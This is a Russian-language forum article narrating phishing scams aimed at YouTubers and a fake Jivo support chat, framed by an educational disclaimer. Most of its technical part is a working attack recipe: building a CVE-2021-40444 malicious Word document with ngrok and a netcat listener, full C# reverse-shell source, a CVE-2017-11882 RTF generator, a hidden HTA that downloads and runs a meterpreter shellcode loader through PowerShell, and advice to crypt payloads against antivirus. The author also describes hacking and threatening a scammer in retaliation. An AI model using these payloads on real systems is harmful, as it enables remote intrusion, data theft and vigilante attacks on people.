Статья По горячим следам: эпизод пять - Reverse Shell в документе, обман через Jivo и немного HTA-малварей


Screenshot_16.png


Салам, выходит уже пятая часть этого цикла, а я до сих пор не придумал приветствие, простите. Сегодня статья будет посвящена свежим и достаточно мощным способам обмана Вас, дорогие друзья, а ещё здесь будет присутствовать много технических подробностей, да-да, знаю, такое заходит на ура. Дисклеймер Вам в руки, а мы начинаем:

Дисклеймер


На самом деле я против зла и то, что я покажу вам далее, может быть,
практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.

По горячим следам: эпизод пять - Reverse Shell в документе, обман через Jivo и немного HTA-малварей

Глубокая темная ночь. Жажда отойти в мир Морфея прямо-таки выбивает здравый рассудок из вашей головы - нужно хорошенько выспаться и закончить дело завтра. Программа для монтажа закрывается, вы заходите в очередной раз на свой канал на Ютуб - всепоглощающее желание, перебивающее сон, увидеть хоть одного нового подписчика, хоть один новый лайк - нет. И тут вы уже гасите свою технику, мысленно размышляя о будущем успехе вашего видоса, а следом и сотням тысяч денежных единиц.

Вот вы ложитесь в кровать, кромешно-мертвое ночное спокойствие разрывает звук уведомления с почты. “Обязан глянуть, может какое рекламное предложение”, - думаете вы, хватаясь за телефон. Глаза ваши вспыхнули огнем, когда заметили, что это действительно так, предложение о сотрудничестве от какой-то неизвестной компании. Посредственному каналу - посредственный бренд.

Видим грамотно составленный, официального стиля текст, который ничем особым отметиться не может, единственное, что сразу привлекает глаз - сумма выплаты за рекламу в ролике - 160.000 рублей, мылит глаза, верно? Внизу прикреплен документ.docx с названием “Идеи для будущих роликов. Полная версия документа доступна только с ПК”. И теперь уже 50% на 50%, ибо именно такой процент людей или не станет делать всё по инструкции, или просто заподозрит неладное.

Кстати история эта вполне реальная, ведь является кратким изложением того, как у моего хорошего знакомого ютубера был сворован не только канал, а и тонны личной информации, включая личные фотографии, данные авторизации от всех сетей, на него даже кредит взяли. Разберемся как? Ну конечно. Накажем ли мы злоумышленников? Вот это уже вряд-ли, по ходу статьи поймете почему.

Вы, как и мой друг, быстро качаете себе на немобильное устройство, данный файл, открываете его… Ну обычный документ, что такого? Дело в том, что скорее всего на той стороне монитора уже давным давно получили шелл на вашем устройстве и подгружают какой-то ратничек по-удобнее. Как так вышло? Давайте разбираться.


Начало: врубайте фонк, берем разгон

Первым делом по старинке анализируем наш фишинг-текст, пример его вы можете увидеть или сверху, или снизу.

Короче я его перенес в начало, дабы на превью попало.

Итак, видим мы относительно хорошо скомпонованный образец, который явно делался по какому-то шаблону. С первых слов автор пытается расположить читателя к себе, представившись, мол вот он я, смотри, далее называет свою должность и рассказывает какую компанию он представляет. Пока что все очень естественно. Рассказ о том, что это за компания и как работает этот ваш облачный гейминг, можно упустить из виду, сия часть текста просто скопирована из поисковика.

А теперь происходит то, чего в реальном письме о сотрудничестве быть не может, этот человек заранее называет сумму, достаточно приличную между прочем, неокрепший и неопытный владелец какого-то канала на 20 тысяч подписчиков, увидев такую сумму придет в экстаз и явно не станет сопротивляться. А почта-то ведь корпоративная, даже не личная - верить можно, подумал бы кто-то.. business@playnware.com , сразу получаем сервис, пиар-менеджером которого якобы есть этот Крокодил Гена. Видим, что он не предназначен для СНГ комьюнити, это зарубежный сайтец.


Следом после вашего соглашения на сотрудничество этот человек сбросит вам или полный прайс-лист документом, или же “идеи для интеграций”, что-то вроде, но где-то обязательно отметит то, что нужно открыть именно у себя на устройстве, именно с помощью Ворда. Сделаете так - вы проиграли, если только не обновляете свою операционную систему каждый день, ведь фикс этой штуки уже вышел.

Но есть два варианта создать подобный файл-шелл, один был обнаружен совсем недавно и носит имя CVE-2021-40444, на нашем портале уже выходила заметка о его эксплуатации, но очень непонятная, попытаюсь заодно растолковать о минусах, плюсах, обнаружении такого вредоноса.

Итак, в руках у нас есть тот самый документ, отправленный моему другу, закидываем его на виртуальную машину, будем экспериментировать. Но потом я подумал, что лучше будет создать свой, для наглядного примера.

А устроено это следующим образом: для эксплуатации этой уязвимости какой-то плохой дядя встраивает в ничем не примечательный документ файл, содержащий ссылочку на ту самую DLL’ку с Reverse shell’ом, простите за склонения. А Майкрософт офис чуть-чуть дурачок и просто будет качать по той ссылке вредонос и запускать его с компонентом ActiveX.

Итак, понадобится нам какой-то простенький C# шелл, найти его можно или на пастербине, или на Гитхабе, ну уж как угодно вам, после этого другим ключевым персонажем будет Ngrok, ну не буду я говорить, как его установить, вот не буду и все. Также сам эксполит, написанный под эту уязвимость, который имеется на… Сами знаете где. Да и щепотка прямых рук с жаждой эксперимента. Рецепт идеального взлома у вас в кармане, ребята.

Screenshot_2021-10-28_14_28_35.png


Сперва давайте запустим сервер Ngrok на порту 6666, ну нравится число мне просто:
Код:
./ngrok http 6666

Окошко этого терминала можно пока что просто скрыть, оно нам понадобится. Затем установим библиотеку lcab и скачаем сам репозиторий:
Код:
sudo apt-get install lcab
git clone https://github.com/lockedbyte/CVE-2021-40444.git
cd CVE-2021-40444

Теперь нам нужно взять код реверс шелла и компилировать тот в dll. Сделать это можно несколькими методами. Первый и самый сложный через среду разработки C#, а второй будет попроще - стандартным средством NET Framework’a, Win+R:
Код:
c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library 1.cs

Ну, а я лично пошел методом попроще и воспользовался компилятором dotpeek, который в последствии поможет и декомпилировать сам вредоносный dll и определить айпи машины злоумышленника. Кстати рекомендую ещё и закриптовать свой код, ибо будет так, как вот вышло с этим.

Screenshot_2021-10-28_14_32_24.png


Вставляем код, изменяем порт и адрес на свой, в моем случае это 192.168.43.112:6666 - правая кнопка мыши - компилировать - dll.

Следом хватаем наш скомпилированный файлик, тащим тот в Кали и продолжаем манипуляции. Запускаем генератор, указав путь к нашей злой шестеренке(dll) и ту самую ссылку с ngrok, последний даже не думаем закрывать конечно:
Код:
python3 exploit.py generate shell.dll https://3ef2-88-155-115-220.ngrok.io

Процесс генерации может занять воистину долгое время, но, благо у меня, всё завершилось за несколько минут. В директории скрипта появится новая папочка - Out, в которой будет сгенерированный вредонос-docx. Достаточно лишь запустить слушатель:
Код:
nc -l -p 6666

Спокойно идем на любой сервис, который предоставляет услуги отправки писем с поддельного адреса и вуаля.

Процент обнаружения этого чуда техники на данный момент составляет 13 из 70 на вирустотале. Сейчас по этой уязвимости создано не менее 10 скриптов, которые чуть-чуть отличаются между собой и процент обнаружения из них иногда ниже.

Кстати вот тот самый реверс C# шелл:
Код:
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
    public class Program
    {
        static StreamWriter streamWriter;

        public static void Main(string[] args)
        {
            using(TcpClient client = new TcpClient("10.0.2.15", 443))
            {
                using(Stream stream = client.GetStream())
                {
                    using(StreamReader rdr = new StreamReader(stream))
                    {
                        streamWriter = new StreamWriter(stream);
                   
                        StringBuilder strInput = new StringBuilder();

                        Process p = new Process();
                        p.StartInfo.FileName = "cmd.exe";
                        p.StartInfo.CreateNoWindow = true;
                        p.StartInfo.UseShellExecute = false;
                        p.StartInfo.RedirectStandardOutput = true;
                        p.StartInfo.RedirectStandardInput = true;
                        p.StartInfo.RedirectStandardError = true;
                        p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                        p.Start();
                        p.BeginOutputReadLine();

                        while(true)
                        {
                            strInput.Append(rdr.ReadLine());
                            //strInput.Append("\n");
                            p.StandardInput.WriteLine(strInput);
                            strInput.Remove(0, strInput.Length);
                        }
                    }
                }
            }
        }

        private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();

            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {
                    strOutput.Append(outLine.Data);
                    streamWriter.WriteLine(strOutput);
                    streamWriter.Flush();
                }
                catch (Exception err) { }
            }
        }

    }
}

Начинаем анализ! Переходим на основную или виртуальную машину с виндой и открываем наш документ - ничего необычного как-бы не происходит, но в диспетчере задач прочему-то процессор загружен, а слушатель успешно ловит обратную оболочку.

Но моей задачей было найти тот самый длл, который Ворд скачивает и запускает, а не проверить работоспособность, ведь у каждого метода есть свои минусы, этот не должен быть исключением.

Не долго думая, я просто открыл корневую папку ворда и вбил в поиск shell.dll, напомню, что именно это было первичным названием вредоноса, ну, на успех я не надеялся, но в папке ActiveX, этот файл уже имелся. Теперь, давайте пойдём в тот же самый компилятор-декомпилятор dotpeek и проведем обратную процедуру к первичной - получаем код реверс шелла, а с ним и IP.

Кстати второй способ создания вредоносного документа как раз таки очень стар. Помните Empire? Я — да, вкратце расскажу.

После установки репозитория, нам понадобится выбрать слушатель http, назначить файл выхода, как .hta и запустить:
Код:
set Listener http
set outfile /tmp/1.hta
execute

После выгружаем HTA файлик, допустим на гугл диск, даем доступ на скачивание всем, у кого есть эта ссылка и переходим по той, ссылку копируем. Желательно её где-то сократить.

Устанавливаем собственно эксплоит:
Код:
git clone https://github.com/likescam/CVE-2017-11882.git
cd CVE-2017-11882

Screenshot_2021-10-28_17_34_04.png


На этом этапе нам понадобится документ в формате rtf, это что-то типа упрощенного doc, после пишем следующее:
Код:
python Command109b_CVE-2017-11882.py -c  https:google.com/glsk-sjt -o 1.rtf

Ну это уже очень мало где работает, но всё таки работает… Угадали? Да, у меня на всех устройствах с Виндовс, смешно.

Какова вероятность, что Крокодил Гена использовал именно тот самый первый способ? Огромная, ведь после запуска на виртуальной машине его документа, в папке ActiveX появился новый .dll. Успех? Практически.

Закидаем тот быстренько в декомпилятор - видим что-то криптованное, видимо эта персона азы обфусцированния постигла. Значит Крокодил находится на принципиально ином уровне развития интеллекта, если сравнивать с его сородичами земноводными. Но для нас проблемой это не есть, имеем страшную силу - запрос в гугле “Деобфускатор C онлайн”. Увенчалось успехом, теперь мы видим айпи этого пройдохи и порт 5053. Что же можно сделать, зная эту информацию? Многое.

Для начала… А нет, теперь небольшая вставочка о другом, только вот эта вставочка и завершит первую часть о уязвимости документа ворд в конце. Вот такая вот многоходовочка.

И сие дело происходило чуть-чуть ранее, в жизни я не задумывался, что подобное может свершиться и, как уже можно было догадаться, это происходило именно со мной. Обстояло все просто гениальнейшим манером, помните же моё желание, потогровать чем-либо, которое привело меня к написанию предыдущей статьи.

Так вот я не опустил руки, невзирая на неудачу, продолжил поиски чего-то стоящего и в одно утро происходит следующее. Мне пишет мой старый знакомый, которой неплохо подкован в области ИБ и сообщает, что что-то нечисто с одним делом и просит проверить.

Screenshot_12_LI.jpg


Дает он мне ссылку на телеграмм аккаунт очень подозрительной личности, просит завязать с тем беседу, дабы тот выдал контакты поставщиков одного товара, который его интересует. Спойлер: всё легально. Вот завожу я диалог, всё окей, парень приветливый, своей манерой общения начал наследовать меня сразу же.

Настораживает конечно, ну прошу его дать ссылки, он без особых колебаний это делает, но постоянно твердит, мол что на сайте заказ работает только с ПК, отследить его тоже можно только так.

Сам сайт ничем не отличается, типичный китайский маркетплейс на первый взор. Товаров достаточно много, имеются отзывы покупателей, но слишком однообразные имена да и ошибки в тексте те же, предварительно предполагаю, что писал один человек. Пробив контакты, указанные внизу, могу сказать, что пусть они и зарубежные, но гугл показывает совершенно другие компании привязанные к ним. Вывод - создатель просто своровал их откуда-то ещё.

Ну и больше подвохов обнаружить не удалось, но только до тех пор, пока я не попробовал оформить заказ, да, а сделано всё здесь именно так, чтобы у человека возник вопрос и именно в это момент появляется чат с консультантом Jivo, совпадение? Я так не думаю.
Этот консультант будет яростно писать, пока вы ему не ответите и не зададите ту гору вопросов, которая накопилась при пользовании ресурсом.

Спросив что-то банальное, в ответ приходит скрин, но файлом, который нельзя просмотреть - только скачать, примечательно, что длина самого названия очень большая и расширения при скачивании не видно. Скачиваем - открываем - обычный скрин. Следующий вопрос - ответ такой же, но теперь он кидает исполняемый .hta файл. На автоматизме жертва нажимает на него и бабах. Всё.

Кстати, вот что-то, а hta-малвари я когда-то создавал. Давайте разберемся, как же сие чудо работает. Для создания такой штуки нам не понадобится учить какой-то язык или что-то ещё, достаточно иметь в распоряжении готовый скелет приложения и набор функций с пояснением.

Screenshot_13.png


Хотя давайте сначала о том, что же такое HTA, а это своеобразный язык программирования, таковым не являющийся, это лишь средство для взаимодействия Виндовс с HTML . Считайте набор стандартных средств. ХТА поддерживает выполнение сценариев, поэтому идеально подходит для внедрения вредоносного кода.

Создавать что-то на HTA очень просто, для того, чтобы стандартного окна у нас не было, нужно использовать следующий скелет:
Код:
<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="MSession"
    BORDER="none"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"
   />
</head>
<body>
</body>
</html>

Теперь с помощью следующих опций отключаем использование интерактивного режима и разрешаем запуск левых скриптов:
Код:
-w hidden -nop -noni -exec bypass

После используем скрипт Powershell, который будет предоставлять нам shell в meterpreter и окультурим чуть-чуть:
Код:
powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.43.113 -lport 6666 -force

Ну и внедряем в скелет:
Код:
<html>

  <head>

    <HTA:APPLICATION ID="oHTA"

      APPLICATIONNAME="MSession"

      BORDER="none"

      SHOWINTASKBAR="no"

      SINGLEINSTANCE="no"

      SYSMENU="no"

      VERSION="1.0"

      WINDOWSTATE="minimize"

     />

  </head>

  <body>
    <script language="VBScript">
      Window.ReSizeTo 0,0
      Window.MoveTo -4000, -4000

      Set wsh = CreateObject("wscript.shell")
      wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.43.113 -lport 666 -force"
      Window.Close
    </script>
  </body>
</html>

Теперь достаточно будет запустить слушатель на Кали:
Код:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.43.113
set LPORT 666
run

К счастью, такое очень легко отследить и в случае с лже-консультантом оказалось ещё проще, но ничего делать с ним мы не будем, а просто копируем его сайт себе, ведь меня больше интересует Крокодил-Гена нежели этот Сергей, хотя и он неплох.

Screenshot_2021-10-28_17_33_14.png


Дело все в том, что после пробива IP Гены ( загвоздка в использовании ним виртуальной машины) через всеми известного бота, не стану называть, но раньше упоминал в работах уже его, оказалось, что его айпи уже был засвечен и привязан к почте. Ну да, пришлось чуть-чуть поперебирать числа, ибо на виртуалке выведенной в открытую сеть, он все же чуть отличается, но результат на лицо.

Мне не пришло идеи лучше, чем устроить этому персонажу спам рассылку с предложением купить что-то по выгодной цене, ссылаясь на свой сайт, только что утянутый у HTA’шера Сергея.

Спустя неделю это таки сработало и он попался в мой чат, в итоге таки открыв тот HTA, хотя мне уже было лень что-то делать и я закрыл на его злодеяния глаза, просто побеседовав. Крокодил Гена даже извинился перед моим другом и вернул тому канал, где уже во всю рекламировал какую-то мошенническую схему, о которой будет следующий выпуск, почему? А, ну да, под угрозой уничтожения его ПК, люди забавные.


Итоги?

Э-э-э, ну да, они самые. Вот такие вот эти мошенники. Не попадайтесь на их уловки и все будет хорошо. Как сказано в дисклеймере, лучший протект - это знания. Мир всем. Фонк можно выключить пока что. ( Нет, нельзя конечно! ).
 
Последнее редактирование:
читая твои статьи я вижу прямо таки себя, браво. сам попался на такую же аферу дживо мне просто снесли все данные
 
  • Нравится
Реакции: DeathDay
Заставили подумать , предпочту этого автора на голосовании . Здорово написанно, но АСМ навсегда
 
  • Нравится
Реакции: DeathDay
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!